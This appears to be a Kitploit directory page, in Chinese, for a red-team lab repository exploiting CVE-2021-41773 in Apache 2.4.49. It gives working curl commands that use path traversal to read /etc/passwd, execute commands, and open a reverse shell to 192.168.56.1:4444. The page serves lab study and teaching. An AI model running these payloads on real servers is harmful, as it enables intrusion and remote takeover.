Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-41773-RedTeam — Apache 2.4.49 路径遍历远程代码执行 | Kitploit
工具/GitHubGitHub/sobanahmed6061/cve-2021-41773-redteam
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHubsobanahmed6061/cve-2021-41773-redteam

CVE-2021-41773-RedTeam

Apache 2.4.49 路径遍历远程代码执行

查看仓库
15个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-41773 — Apache HTTP Server 2.4.49 路径遍历 / RCE

ITSOLERA 网络安全部门 — 红队任务 #3
团队: Offensive Team Zeta
日期: 2026年3月18日


⚠️ 免责声明

本仓库仅用于教育目的。
所有测试均在隔离的本地 Docker 实验环境中执行。
切勿用于在线、生产或第三方系统。


CVE 摘要

字段详情
CVE IDCVE-2021-41773
CVSS9.8 严重
受影响版本仅 Apache HTTP Server 2.4.49
类型路径遍历 + 远程代码执行
修复版本Apache 2.4.51

仓库内容


实验环境搭建

root@kitploit:~
# 拉取存在漏洞的镜像
sudo docker pull blueteamsteve/cve-2021-41773:with-cgid

# 启动实验环境
docker-compose up -d

# 验证 Apache 2.4.49 是否运行
curl -I http://localhost:8080/
# 应显示: Server: Apache/2.4.49

利用方法

root@kitploit:~
# 通过路径遍历读取文件
curl --path-as-is \
    'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'

# 远程代码执行
curl --path-as-is \
    -d 'echo Content-Type: text/plain; echo; id' \
    'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

# 反弹 Shell(将 IP 替换为你本机的 IP)
curl --path-as-is \
    -d "echo Content-Type: text/plain; echo; bash -c 'bash -i >& /dev/tcp/192.168.56.1/4444 0>&1'" \
    "http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"

参考链接

  • https://nvd.nist.gov/vuln/detail/CVE-2021-41773
  • https://www.exploit-db.com/exploits/50383
  • https://httpd.apache.org/security/vulnerabilities_24.html
下载工具
文件说明
poc_41773.py带有 Team Zeta 横幅的 Python PoC 利用脚本
docker-compose.yml漏洞实验环境配置
offensive_zeta_shell.txt实时会话日志 — 利用验证
screenshots/证据截图
Offensive_Team_Zeta_FINAL_Report.pdf完整利用报告